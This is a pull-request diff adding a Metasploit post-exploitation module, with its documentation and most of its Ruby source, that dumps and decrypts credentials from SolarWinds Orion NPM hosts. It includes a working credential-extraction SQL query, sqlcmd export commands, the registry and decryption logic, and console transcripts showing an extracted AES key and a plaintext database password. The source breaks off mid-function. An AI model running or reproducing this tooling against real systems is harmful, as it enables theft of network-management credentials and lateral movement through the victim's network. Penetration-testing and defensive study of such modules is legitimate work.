### PR TITLE
Add solarwinds_orion_dump post module

### DIFF
--- a/documentation/modules/post/windows/gather/credentials/solarwinds_orion_dump.md
+++ b/documentation/modules/post/windows/gather/credentials/solarwinds_orion_dump.md
@@ -6,7 +6,7 @@ Orion NPM installed. The module supports decryption of AES-256, RSA, and XMLSEC 
 actions for extraction and decryption of the data are provided to allow session migration during
 execution in order to log in to the SQL database using SSPI. Tested on  the 2020 version of
 SolarWinds Orion NPM. This module is possible only because of the source code and technical
-information published by Djordje Atlialp:
+information published by Rob Fuller:
 
 https://malicious.link/post/2020/solarflare-release-password-dumper-for-SolarWinds-orion
 

--- a/documentation/modules/post/windows/gather/credentials/solarwinds_orion_dump.md
+++ b/documentation/modules/post/windows/gather/credentials/solarwinds_orion_dump.md
@@ -122,6 +122,18 @@ JOIN
   [dbo].[CredentialProperty] AS cp ON (c.ID=cp.CredentialID)
 ```
 
+Output must be encoded VARBINARY per above, and must be well-formed CSV (i.e. no trailing whitespace).
+If using `sqlcmd`, ensure the `-W` and `-I` parameters are included to strip trailing whitespace and
+allow quoted identifyers. Suggested syntax for `sqlcmd` using Windows authentication is below, where
+the contents of `solarwinds_sql_query.sql` is the text of the SQL query above:
+
+`sqlcmd -d "<DBNAME>" -S <MSSQL_INSTANCE> -E -i solarwinds_sql_query.sql -o solarwinds_dump.csv -h-1 -s"," -w 65535 -W -I`
+
+This should place a CSV export file suitable for use within the module at `solarwinds_dump.csv`. If
+using SQL native auth, replace the `-E` parameter with
+
+`-U "<MSSQL_USER>" -P "<MSSQL_PASS>"`
+
 ### Examples
 
 Windows Server 2019 host running Orion NPM 2020 using the `dump` action:

--- a/documentation/modules/post/windows/gather/credentials/solarwinds_orion_dump.md
+++ b/documentation/modules/post/windows/gather/credentials/solarwinds_orion_dump.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
-This module exports and decrypts credentials from SolarWindows Orion Network Performance Monitor
-to a CSV file; it is intended as a post-exploitation module for Windows hosts with SolarWindows
+This module exports and decrypts credentials from SolarWinds Orion Network Performance Monitor
+to a CSV file; it is intended as a post-exploitation module for Windows hosts with SolarWinds
 Orion NPM installed. The module supports decryption of AES-256, RSA, and XMLSEC secrets. Separate
 actions for extraction and decryption of the data are provided to allow session migration during
 execution in order to log in to the SQL database using SSPI. Tested on  the 2020 version of
@@ -101,7 +101,7 @@ execute the SQL query below against the Orion database and save the resulting ro
 
 The CSV header must match:
 
-`CredentialID,Name,Description,CredentialType,CredentialOwner,CredentialPropertyName,Value,Encrypted`:
+`CredentialID,Name,Description,CredentialType,CredentialOwner,CredentialPropertyName,Value,Encrypted`
 
 Columns are cast `VARBINARY` to deal with poor CSV export support in `sqlcmd`. Export the results of
 the query below to CSV file:

--- a/documentation/modules/post/windows/gather/credentials/solarwinds_orion_dump.md
+++ b/documentation/modules/post/windows/gather/credentials/solarwinds_orion_dump.md
@@ -1,0 +1,263 @@
+This module exports and decrypts credentials from SolarWindows Orion Network Performance Monitor
+to a CSV file; it is intended as a post-exploitation module for Windows hosts with SolarWindows
+Orion NPM installed. The module supports decryption of AES-256, RSA, and XMLSEC secrets. Separate
+actions for extraction and decryption of the data are provided to allow session migration during
+execution in order to log in to the SQL database using SSPI. Tested on  the 2020 version of
+SolarWinds Orion NPM. This module is possible only because of the source code and technical
+information published by Djordje Atlialp:
+
+https://malicious.link/post/2020/solarflare-release-password-dumper-for-SolarWinds-orion
+
+and Atredis Partners:
+
+https://github.com/atredispartners/solarwinds-orion-cryptography
+
+## Vulnerable Application
+
+This is a post module and requires a meterpreter session on the Microsoft Windows server host
+with a configured instance of SolarWindows Orion Network Performance Monitor installed. 
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get session on host via method of choice and background it
+3. Do: `use post/windows/gather/credentials/solarwinds_orion_dump`
+4. Do: `set session <session>`
+5. Do: `dump` to extract and decrypt the Orion database, or `export` to extract the encrypted database only
+
+If `dump` or `export` fail, the session identity may need permission to log in to SQL; see `Scenarios` below.
+
+## Options
+
+### SESSION
+
+Which session to use, which can be viewed with `sessions -l`
+
+## Advanced Options
+
+### AES_KEY
+
+The AES-256 key extracted from `default.dat` in hexadecimal format. Provide this option
+when invoking offline decryption using the `decrypt` action.
+
+### CERT_SHA1
+
+The SHA1 thumbprint of the SSL certificate in the Windows machine certificate store that
+is assigned to SolarWinds Orion for decryption of RSA and XMLSEC secrets. Set this option
+if Orion uses a custom certificate or has multiple certificates in the store with a Subject
+Common Name of `CN=solarwinds-orion`.
+
+### CSV_FILE
+
+Path to a CSV file that contains the encrypted Orion database data that has been
+previously exported. Provide this option when invoking offline decryption using the
+`decrypt` action.
+
+### MSSQL_DB
+
+The MSSQL database name used by Orion, specified in the `INITIAL CATALOG` as extracted
+from `SWNetPerfMon.DB`. Provide this option when invoking the `export` action.
+
+### MSSQL_INSTANCE
+
+The path to the MSSQL instance used by Orion, specified in the `DATA SOURCE` as extracted
+from `SWNetPerfMon.DB`. Provide this option when invoking the `export` action.
+
+### RSA_KEY_FILE
+
+Path to the extracted RSA private key associated with the certificate assigned to SolarWinds
+Orion for decryption of RSA and XMLSEC secrets. Provide this option when invoking offline
+decryption using the `decrypt` action, or you wish to provide alternative RSA private key
+material during `dump`.
+
+## Scenarios
+
+### SQL Data Acquisition
+
+The sqlcmd binaries (part of the SQL Server Management Studio) must be installed on the system
+to access the database. Orion does not install SSMS or sqlcmd by default if it is not also
+installing a local SQL server instance - in such cases, it will be necessary to extract the
+encrypted database manually and provide the module with a path to the extracted data. To do so
+execute the SQL query below against the Orion database and save the resulting row set as a CSV file.
+
+The CSV header must match:
+
+`CredentialID,Name,Description,CredentialType,CredentialOwner,CredentialPropertyName,Value,Encrypted`:
+
+Columns are cast `VARBINARY` to deal with poor CSV export support in `sqlcmd`. Export the results of
+the query below to CSV file:
+
+```
+SELECT 
+  c.ID AS CredentialID,
+  CONVERT(VARBINARY(1024),c.Name) Name,
+  CONVERT(VARBINARY(1024),c.Description) Description,
+  CONVERT(VARBINARY(256),c.CredentialType) CredentialType,
+  CONVERT(VARBINARY(256),c.CredentialOwner) CredentialOwner,
+  CONVERT(VARBINARY(1024),cp.Name) CredentialPropertyName,
+  CONVERT(VARBINARY(8000),cp.Value) Value,
+  cp.Encrypted 
+FROM
+  [dbo].[Credential] AS c
+JOIN 
+  [dbo].[CredentialProperty] AS cp ON (c.ID=cp.CredentialID)
+```
+
+Provide the path to this file in the `CSV_FILE` advanced option along with the `MSSQL_INSTANCE`,
+`MSSQL_DB`, `AES_KEY` and `RSA_KEY_FILE` to perform offline decryption using the `decrypt` action. 
+
+### Examples
+
+Windows Server 2019 host running Orion NPM 2020 using the `dump` action:
+
+```
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/solarwinds_orion_dump
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set session 1
+session => 1
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > dump
+
+[*] Hostname WINNING IPv4 192.168.101.125
+[*] SolarWinds Orion Build 2020.26512
+[*] SolarWinds Orion Install Path: C:\Program Files (x86)\SolarWinds\Orion\
+[*] Init SolarWinds Crypto ...
+[*] Decrypt SolarWinds CryptoHelper Keystorage ...
+[+] Compressed size: 2104
+[+] Orion AES Encryption Key
+[+]     HEX: 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+[*] Extract SolarWinds Orion SSL Certificate Private Key ...
+[+] Compressed size: 1344
+[+] Compressed size: 1736
+[+] Extracted SolarWinds Orion RSA private key for LocalMachine certificate with SHA1 thumbprint C3D5248B978C8D161DA0267C1DE946B1FDE4E7D2
+[+] SolarWinds Orion RSA Key: /root/.msf4/loot/20221118093908_default_192.168.101.125_orionssl_000289.key
+[*] Decrypt SWNetPerfMon.DB ...
+[+] Compressed size: 2064
+[+] SolarWinds Orion SQL Database Connection Configuration:
+[+]     Instance Name: tcp:cornflakes.cesium137.io
+[+]     Database Name: SolarWindsOrion
+[+]     Database User: orion
+[+]     Database Pass: 3qmEixYNZsElaE0JR0vt9c1NwO
+[*] Performing export of SolarWinds Orion SQL database to CSV file
+[*] Export SolarWinds Orion DB ...
+[+] 10 rows exported, 6 unique CredentialIDs
+[+] Encrypted SolarWinds Orion Database Dump: /root/.msf4/loot/20221118093912_default_192.168.101.125_solarwinds_orion_822163.txt
+[*] Performing decryption of SolarWinds Orion SQL database
+[+] 10 rows loaded, 6 unique CredentialIDs
+[*] Process SolarWinds Orion DB ...
+[+] 10 rows processed
+[*] 10 rows recovered: 6 plaintext, 4 decrypted (0 blank)
+[*] 10 rows written (0 blank rows withheld)
+[+] 6 unique CredentialID records recovered
+[+] Decrypted SolarWinds Orion Database Dump: /root/.msf4/loot/20221118093912_default_192.168.101.125_solarwinds_orion_067745.txt
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) >
+```
+
+Host with MSSQL SSPI authentication configured for external database - use `dump` to
+extract keys, then migrate the session PID to an identity with permission to log on to
+the SQL server. Perform `export` to acquire the encrypted data, then perform `decrypt`
+to produce the plaintext:
+
+```
+msf6 exploit(multi/handler) > use post/windows/gather/credentials/solarwinds_orion_dump
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set session 1
+session => 1
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > dump
+
+[*] Hostname WINNING IPv4 192.168.101.125
+[*] SolarWinds Orion Build 2020.26512
+[*] SolarWinds Orion Install Path: C:\Program Files (x86)\SolarWinds\Orion\
+[*] Init SolarWinds Crypto ...
+[*] Decrypt SolarWinds CryptoHelper Keystorage ...
+[+] Compressed size: 2108
+[+] Orion AES Encryption Key
+[+]     HEX: 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+[*] Extract SolarWinds Orion SSL Certificate Private Key ...
+[+] Compressed size: 1344
+[+] Compressed size: 1748
+[+] Extracted SolarWinds Orion RSA private key for LocalMachine certificate with SHA1 thumbprint C3D5248B978C8D161DA0267C1DE946B1FDE4E7D2
+[+] SolarWinds Orion RSA Key: /root/.msf4/loot/20221118091221_default_192.168.101.125_orionssl_457287.key
+[*] Decrypt SWNetPerfMon.DB ...
+[+] SolarWinds Orion SQL Database Connection Configuration:
+[+]     Instance Name: tcp:cornflakes.cesium137.io
+[+]     Database Name: SolarWindsOrion
+[+]     Database User: (Windows Integrated)
+[!] The database uses Windows authentication
+[!] Session identity must have access to the SQL server instance to proceed
+[*] Performing export of SolarWinds Orion SQL database to CSV file
+[*] Export SolarWinds Orion DB ...
+[-] Sqlcmd: Error: Microsoft ODBC Driver 13 for SQL Server : Login failed for user 'CESIUM137\WINNING$'..
+[-] No records exported from SQL server
+[-] Post aborted due to failure: unknown: Could not export SolarWinds Orion database records
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set AES_KEY 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+AES_KEY => 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set RSA_KEY_FILE /root/.msf4/loot/20221118091221_default_192.168.101.125_orionssl_457287.key
+RSA_KEY_FILE => /root/.msf4/loot/20221118091221_default_192.168.101.125_orionssl_457287.key
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set MSSQL_INSTANCE tcp:cornflakes.cesium137.io
+MSSQL_INSTANCE => tcp:cornflakes.cesium137.io
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set MSSQL_DB SolarWindsOrion
+MSSQL_DB => SolarWindsOrion
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > ps
+
+Process List
+============
+
+ PID    PPID   Name                                     Arch  Session  User                                Path
+ ---    ----   ----                                     ----  -------  ----                                ----
+ 0      0      [System Process]
+ 4      0      System                                   x64   0
+ [...]
+ 10704  10636  explorer.exe                             x64   1        CESIUM137\operatorman               C:\Windows\explorer.exe
+ [...]
+
+meterpreter > migrate 10704
+[*] Migrating from 17108 to 10704...
+[*] Migration completed successfully.
+meterpreter > bg
+[*] Backgrounding session 1...
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > export
+
+[*] Hostname WINNING IPv4 192.168.101.125
+[*] SolarWinds Orion Build 2020.26512
+[*] SolarWinds Orion Install Path: C:\Program Files (x86)\SolarWinds\Orion\
+[*] Init SolarWinds Crypto ...
+[+] Orion AES Encryption Key
+[+]     HEX: 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+[*] Extract SolarWinds Orion SSL Certificate Private Key ...
+[*] MSSQL_INSTANCE and MSSQL_DB advanced options set, connect to SQL using SSPI
+[+] SolarWinds Orion SQL Database Connection Configuration:
+[+]     Instance Name: tcp:cornflakes.cesium137.io
+[+]     Database Name: SolarWindsOrion
+[+]     Database User: (Windows Integrated)
+[!] The database uses Windows authentication
+[!] Session identity must have access to the SQL server instance to proceed
+[*] Performing export of SolarWinds Orion SQL database to CSV file
+[*] Export SolarWinds Orion DB ...
+[+] 10 rows exported, 6 unique CredentialIDs
+[+] Encrypted SolarWinds Orion Database Dump: /root/.msf4/loot/20221118091938_default_192.168.101.125_solarwinds_orion_412973.txt
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > set CSV_FILE /root/.msf4/loot/20221118091938_default_192.168.101.125_solarwinds_orion_412973.txt
+CSV_FILE => /root/.msf4/loot/20221118091938_default_192.168.101.125_solarwinds_orion_412973.txt
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) > decrypt 
+
+[*] Hostname WINNING IPv4 192.168.101.125
+[*] SolarWinds Orion Build 2020.26512
+[*] SolarWinds Orion Install Path: C:\Program Files (x86)\SolarWinds\Orion\
+[*] Init SolarWinds Crypto ...
+[+] Orion AES Encryption Key
+[+]     HEX: 2F627B78981DEADE0447CC7BDDEADE4E84FCB96AF1C6DEAD621F28547E93A82
+[*] Extract SolarWinds Orion SSL Certificate Private Key ...
+[*] Performing decryption of SolarWinds Orion SQL database
+[+] 10 rows loaded, 6 unique CredentialIDs
+[*] Process SolarWinds Orion DB ...
+[+] 10 rows processed
+[*] 10 rows recovered: 6 plaintext, 4 decrypted (0 blank)
+[*] 10 rows written (0 blank rows withheld)
+[+] 6 unique CredentialID records recovered
+[+] Decrypted SolarWinds Orion Database Dump: /root/.msf4/loot/20221118091959_default_192.168.101.125_solarwinds_orion_687493.txt
+[*] Post module execution completed
+msf6 post(windows/gather/credentials/solarwinds_orion_dump) >
+```

--- a/modules/post/windows/gather/credentials/solarwinds_orion_dump.rb
+++ b/modules/post/windows/gather/credentials/solarwinds_orion_dump.rb
@@ -26,12 +26,12 @@ class MetasploitModule < Msf::Post
           extraction and decryption of the data are provided to allow session migration
           during execution in order to log in to the SQL database using SSPI. Tested on
           the 2020 version of SolarWinds Orion NPM. This module is possible only because
-          of the source code and technical information published by Djordje Atlialp and
+          of the source code and technical information published by Rob Fuller and
           Atredis Partners.
         },
         'Author' => [
           'npm[at]cesium137.io', # Metasploit Module
-          'djordje.atlialp@gmail.com' # @rhazdon - Original research
+          'Rob Fuller' # @mubix - Original research
         ],
         'Platform' => [ 'win' ],
         'DisclosureDate' => '2022-11-08',

--- a/modules/post/windows/gather/credentials/solarwinds_orion_dump.rb
+++ b/modules/post/windows/gather/credentials/solarwinds_orion_dump.rb
@@ -1,0 +1,647 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/credential_collection'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::Windows::MSSQL
+  include Msf::Post::Windows::Powershell
+  include Msf::Post::Windows::Registry
+
+  Rank = ManualRanking
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SolarWinds Orion Secrets Dump',
+        'Description' => %q{
+          This module exports and decrypts credentials from SolarWindows Orion Network
+          Performance Monitor (NPM) to a CSV file; it is intended as a post-exploitation
+          module for Windows hosts with SolarWindows Orion NPM installed. The module
+          supports decryption of AES-256, RSA, and XMLSEC secrets. Separate actions for
+          extraction and decryption of the data are provided to allow session migration
+          during execution in order to log in to the SQL database using SSPI. Tested on
+          the 2020 version of SolarWinds Orion NPM. This module is possible only because
+          of the source code and technical information published by Djordje Atlialp and
+          Atredis Partners.
+        },
+        'Author' => 'npm[at]cesium137.io',
+        'Platform' => [ 'win' ],
+        'DisclosureDate' => '2022-11-08',
+        'SessionTypes' => [ 'meterpreter' ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://malicious.link/post/2020/solarflare-release-password-dumper-for-SolarWinds-orion/'],
+          ['URL', 'https://github.com/atredispartners/solarwinds-orion-cryptography'],
+        ],
+        'Actions' => [
+          [
+            'Dump',
+            {
+              'Description' => 'Export SolarWinds Orion database and perform decryption'
+            }
+          ],
+          [
+            'Export',
+            {
+              'Description' => 'Export SolarWinds Orion database without decryption'
+            }
+          ],
+          [
+            'Decrypt',
+            {
+              'Description' => 'Decrypt SolarWinds Orion database export CSV file'
+            }
+          ]
+        ],
+        'DefaultAction' => 'Dump',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'Privileged' => true
+      )
+    )
+    register_advanced_options([
+      OptString.new('CERT_SHA1', [ false, 'Specify SHA-1 thumbprint of Orion SSL Certificate instead of attempting to find by CN']),
+      OptPath.new('CSV_FILE', [ false, 'Path to database export CSV file if using the decrypt action' ]),
+      OptPath.new('RSA_KEY_FILE', [ false, 'Path to RSA private key file in PEM format if using the decrypt action' ]),
+      OptString.new('AES_KEY', [ false, 'Orion AES-256 encryption key in hex' ]),
+      OptString.new('MSSQL_INSTANCE', [ false, 'The MSSQL instance path from SolarWinds Orion MSSQL connection string' ]),
+      OptString.new('MSSQL_DB', [ false, 'The MSSQL database name from SolarWinds Orion MSSQL connection string' ])
+    ])
+  end
+
+  def export_header_row
+    'CredentialID,Name,Description,CredentialType,CredentialOwner,CredentialPropertyName,Value,Encrypted'
+  end
+
+  def result_header_row
+    'CredentialID,Name,Description,CredentialType,CredentialOwner,CredentialPropertyName,Plaintext,Method'
+  end
+
+  def run
+    fail_with(Msf::Exploit::Failure::NoTarget, 'Could not initialize') unless init_module
+    current_action = action.name.downcase
+    if current_action == 'export' || current_action == 'dump'
+      print_status('Performing export of SolarWinds Orion SQL database to CSV file')
+      fail_with(Msf::Exploit::Failure::Unknown, 'Could not export SolarWinds Orion database records') unless (encrypted_csv_file = export)
+      print_good("Encrypted SolarWinds Orion Database Dump: #{encrypted_csv_file}")
+    end
+    if current_action == 'decrypt' || current_action == 'dump'
+      encrypted_csv_file ||= datastore['CSV_FILE']
+      fail_with(Msf::Exploit::Failure::BadConfig, 'You must set CSV_FILE advanced option') if encrypted_csv_file.nil?
+
+      fail_with(Msf::Exploit::Failure::BadConfig, 'Invalid CSV input file') unless ::File.file?(encrypted_csv_file)
+
+      print_status('Performing decryption of SolarWinds Orion SQL database')
+      fail_with(Msf::Exploit::Failure::Unknown, 'Could not decrypt exported SolarWinds Orion database records') unless (decrypted_csv_file = decrypt(encrypted_csv_file))
+      print_good("Decrypted SolarWinds Orion Database Dump: #{decrypted_csv_file}")
+    end
+  end
+
+  def export
+    unless (csv = dump_orion_db)
+      print_error('No records exported from SQL server')
+      return false
+    end
+    total_rows = csv.count
+    print_good("#{total_rows} rows exported, #{@orion_total_secrets} unique CredentialIDs")
+    encrypted_data = csv.to_s.delete("\000")
+    store_loot('solarwinds_orion_enc', 'text/csv', rhost, encrypted_data, "#{@orion_db_name}.csv", 'Encrypted Database Dump')
+  end
+
+  def decrypt(csv_file)
+    unless (csv = read_csv_file(csv_file))
+      print_error('No records imported from CSV dataset')
+      return false
+    end
+    total_rows = csv.count
+    print_good("#{total_rows} rows loaded, #{@orion_total_secrets} unique CredentialIDs")
+    result = decrypt_orion_db(csv)
+    orion_processed_rows = result[:processed_rows]
+    orion_blank_rows = result[:blank_rows]
+    orion_decrypted_rows = result[:decrypted_rows]
+    orion_plaintext_rows = result[:plaintext_rows]
+    orion_failed_rows = result[:failed_rows]
+    result_rows = result[:result_csv]
+    unless result_rows
+      print_error('Failed to decrypt CSV dataset')
+      return false
+    end
+    total_result_rows = result_rows.count - 1 # Do not count header row
+    total_result_secrets = result_rows['CredentialID'].uniq.count - 1
+    if orion_processed_rows == orion_failed_rows || total_result_rows <= 0
+      print_error('No rows could be processed')
+      return false
+    elsif orion_failed_rows > 0
+      print_warning("#{orion_processed_rows} rows processed (#{orion_failed_rows} rows failed)")
+    else
+      print_good("#{orion_processed_rows} rows processed")
+    end
+    total_records = orion_decrypted_rows + orion_plaintext_rows
+    print_status("#{total_records} rows recovered: #{orion_plaintext_rows} plaintext, #{orion_decrypted_rows} decrypted (#{orion_blank_rows} blank)")
+    decrypted_data = result_rows.to_s.delete("\000")
+    print_status("#{total_result_rows} rows written (#{orion_blank_rows} blank rows withheld)")
+    print_good("#{total_result_secrets} unique CredentialID records recovered")
+    store_loot('solarwinds_orion_dec', 'text/csv', rhost, decrypted_data, "#{@orion_db_name}.csv", 'Decrypted Database Dump')
+  end
+
+  def dump_orion_db
+    # CONVERT(VARBINARY()) is an awful hack to get around sqlcmd's equally awful support for CSV output
+    sql_query = 'SET NOCOUNT ON;SELECT c.ID AS CredentialID,
+      CONVERT(VARBINARY(1024),c.Name) Name,
+      CONVERT(VARBINARY(1024),c.Description) Description,
+      CONVERT(VARBINARY(256),c.CredentialType) CredentialType,
+      CONVERT(VARBINARY(256),c.CredentialOwner) CredentialOwner,
+      CONVERT(VARBINARY(1024),cp.Name) CredentialPropertyName,
+      CONVERT(VARBINARY(8000),cp.Value) Value,
+      cp.Encrypted FROM [dbo].[Credential] AS c JOIN [dbo].[CredentialProperty] AS cp ON (c.ID=cp.CredentialID)'
+    sql_cmd = sql_prepare(sql_query)
+    print_status('Export SolarWinds Orion DB ...')
+    query_result = cmd_exec(sql_cmd)
+    if query_result.downcase.start_with?('sqlcmd: error:')
+      print_error(query_result)
+      return false
+    end
+    csv = ::CSV.parse(query_result.gsub("\r", ''), row_sep: :auto, headers: export_header_row, quote_char: "\x00", skip_blanks: true)
+    unless csv
+      print_error('Error parsing SQL dataset into CSV format')
+      return false
+    end
+    @orion_total_secrets = csv['CredentialID'].uniq.count
+    unless @orion_total_secrets >= 1 && !csv['CredentialID'].uniq.first.nil?
+      print_error('SQL dataset contains no CredentialID column values')
+      return false
+    end
+    csv
+  end
+
+  def decrypt_orion_db(csv_dataset)
+    current_row = 0
+    decrypted_rows = 0
+    plaintext_rows = 0
+    blank_rows = 0
+    failed_rows = 0
+    result_csv = ::CSV.parse(result_header_row, headers: :first_row, write_headers: true, return_headers: true)
+    print_status('Process SolarWinds Orion DB ...')
+    csv_dataset.each do |row|
+      current_row += 1
+      secret_plaintext = nil
+      credential_id = row['CredentialID']
+      if credential_id.nil?
+        failed_rows += 1
+        print_error("Row #{current_row} missing CredentialID column, skipping")
+        next
+      end
+      secret_name = [row['Name'][2..]].pack('H*').delete("\000")
+      secret_description = [row['Description'][2..]].pack('H*').delete("\000")
+      secret_type = [row['CredentialType'][2..]].pack('H*').delete("\000")
+      secret_owner = [row['CredentialOwner'][2..]].pack('H*').delete("\000")
+      secret_property_name = [row['CredentialPropertyName'][2..]].pack('H*').delete("\000")
+      secret_ciphertext = [row['Value'][2..]].pack('H*').delete("\000")
+      if secret_ciphertext.nil?
+        vprint_warning("CredentialID #{credential_id} name '#{secret_name}' Value column nil, excluding")
+        blank_rows += 1
+        next
+      end
+      secret_encrypted = row['Encrypted'].to_i
+      if secret_encrypted == 1
+        decrypt_result = orion_secret_decrypt(secret_ciphertext)
+        if decrypt_result
+          secret_plaintext = decrypt_result['Plaintext']
+          decrypt_method = decrypt_result['Method']
+        else
+          print_error("CredentialID #{credential_id} field '#{secret_name}' failed to decrypt")
+          vprint_error(row.to_s)
+          failed_rows += 1
+          next
+        end
+        if secret_plaintext.nil?
+          vprint_warning("CredentialID #{credential_id} name '#{secret_name}' decrypted Value nil, excluding")
+          blank_rows += 1
+          next
+        end
+        if !secret_plaintext
+          print_error("CredentialID #{credential_id} field '#{secret_name}' failed to decrypt")
+          vprint_error(row.to_s)
+          failed_rows += 1
+          next
+        end
+        secret_disposition = "decrypted #{decrypt_method}"
+        decrypted_rows += 1
+      else
+        secret_plaintext = secret_ciphertext
+        secret_disposition = 'plaintext'
+        decrypt_method = 'Plaintext'
+        plaintext_rows += 1
+      end
+      if !secret_plaintext.empty?
+        result_line = [credential_id.to_s, secret_name.to_s, secret_description.to_s, secret_type.to_s, secret_owner.to_s, secret_property_name.to_s, secret_plaintext.to_s, decrypt_method.to_s]
+        result_row = ::CSV.parse_line(CSV.generate_line(result_line).gsub("\r", ''))
+        result_csv << result_row
+        vprint_status("CredentialID #{credential_id} name '#{secret_name}' property '#{secret_property_name}' recovered: #{secret_disposition}")
+      else
+        vprint_warning("CredentialID #{credential_id} name '#{secret_name}' property '#{secret_property_name}' recovered value empty, excluding")
+        blank_rows += 1
+      end
+    end
+    {
+      processed_rows: current_row,
+      blank_rows: blank_rows,
+      decrypted_rows: decrypted_rows,
+      plaintext_rows: plaintext_rows,
+      failed_rows: failed_rows,
+      result_csv: result_csv
+    }
+  end
+
+  def init_module
+    @orion_hostname = get_env('COMPUTERNAME')
+    print_status("Hostname #{@orion_hostname} IPv4 #{rhost}")
+    require_sql = action.name.downcase == 'export' || action.name.downcase == 'dump' # only need to be concerned with SQL if doing these actions
+    if require_sql
+      # TODO: Orion does not install SSMS / sqlcmd by default if it is using an external SQL server.
+      # Even when sqlcmd is available we have to do hideous things; MSSQL client functionality built
+      # into Exploit does not extend to Post, and trying to mix it in makes weird errors.
+      # It may be possible to roll a "SQL client" using PowerShell provided we can stick to native
+      # cmdlets but I am not 100% sure that is not reinventing the wheel.
+      get_sql_client
+      unless @sql_client == 'sqlcmd'
+        print_error('Unable to identify sqlcmd SQL client on target host')
+        return false
+      end
+      vprint_good("Found SQL client: #{@sql_client}")
+    end
+    get_orion_version
+    unless @orion_build
+      print_error('Could not determine SolarWinds Orion build')
+      return false
+    end
+    orion_path = get_orion_path
+    unless orion_path
+      print_error('Could not determine SolarWinds Orion install path')
+      return false
+    end
+    return false unless init_orion_encryption
+
+    if require_sql && !init_orion_db(orion_path)
+      return false
+    end
+
+    true
+  end
+
+  def read_csv_file(file_name)
+    unless File.exist?(file_name)
+      print_error("CSV file #{file_name} not found")
+      return false
+    end
+    csv_rows = ::File.binread(file_name)
+    csv = ::CSV.parse(csv_rows.gsub("\r", ''), row_sep: :auto, headers: :first_row, quote_char: "\x00", skip_blanks: true)
+    unless csv
+      print_error("Error importing CSV file #{file_name}")
+      return false
+    end
+    @orion_total_secrets = csv['CredentialID'].uniq.count
+    unless @orion_total_secrets >= 1 && !csv['CredentialID'].uniq.first.nil?
+      print_error("Provided CSV file #{file_name} contains no CredentialID column values")
+      return false
+    end
+    csv
+  end
+
+  def get_orion_version
+    reg_key = 'HKLM\\SOFTWARE\\WOW6432Node\\SolarWinds\\Orion\\Core'
+    unless registry_key_exist?(reg_key)
+      print_error("Registry key #{reg_key} not found")
+      return false
+    end
+    orion_version = registry_getvaldata(reg_key, 'Version')
+    unless orion_version
+      print_error("Could not find Version registry entry under #{reg_key}")
+      return false
+    end
+    orion_build_major = orion_version.split('.')[0]
+    orion_build_minor = orion_version.split('.')[1]
+    orion_build_rev = "#{orion_version.split('.')[2]}#{orion_version.split('.')[3]}"
+    @orion_build = "#{orion_build_major}.#{orion_build_minor}#{orion_build_rev}".to_f
+    unless @orion_build > 0
+      print_error('Error determining SolarWinds Orion version from SQL query')
+      return false
+    end
+    print_status("SolarWinds Orion Build #{@orion_build}")
+  end
+
+  def get_orion_path
+    reg_key = 'HKLM\\SOFTWARE\\WOW6432Node\\SolarWinds\\Orion\\Core'
+    unless registry_key_exist?(reg_key)
+      print_error("Registry key #{reg_key} not found")
+      return false
+    end
+    orion_path = registry_getvaldata(reg_key, 'InstallPath').to_s
+    unless orion_path
+      print_error("Could not find InstallPath registry entry under #{reg_key}")
+      return false
+    end
+    print_status("SolarWinds Orion Install Path: #{orion_path}")
+    orion_path
+  end
+
+  def sql_prepare(sql_query)
+    if @orion_db_integrated_auth
+      sql_cmd = "#{@sql_client} -d \"#{@orion_db_name}\" -S #{@orion_db_instance_path} -E -Q \"#{sql_query}\" -h-1 -s\",\" -w 65535 -W -I".gsub("\r", '').gsub("\n", '')
+    else
+      sql_cmd = "#{@sql_client} -d \"#{@orion_db_name}\" -S #{@orion_db_instance_path} -U \"#{@orion_db_user}\" -P \"#{@orion_db_pass}\" -Q \"#{sql_query}\" -h-1 -s\",\" -w 65535 -W -I".gsub("\r", '').gsub("\n", '')
+    end
+    sql_cmd
+  end
+
+  def read_config_file(config_file)
+    unless file_exist?(config_file)
+      print_error("Configuration file '#{config_file}' not found or is not accessible")
+      return false
+    end
+    read_file(config_file)
+  end
+
+  def get_orion_certificate
+    print_status('Extract SolarWinds Orion SSL Certificate Private Key ...')
+    if datastore['RSA_KEY_FILE']
+      return false unless ::File.file?(datastore['RSA_KEY_FILE'])
+
+      key_pem = ::File.binread(datastore['RSA_KEY_FILE'])
+      @orion_rsa_key = ::OpenSSL::PKey::RSA.new(key_pem)
+      vprint_good("Loading SolarWinds Orion RSA private key from file #{datastore['RSA_KEY_FILE']}")
+    end
+    return nil unless @orion_rsa_key.nil?
+
+    if datastore['CERT_SHA1']
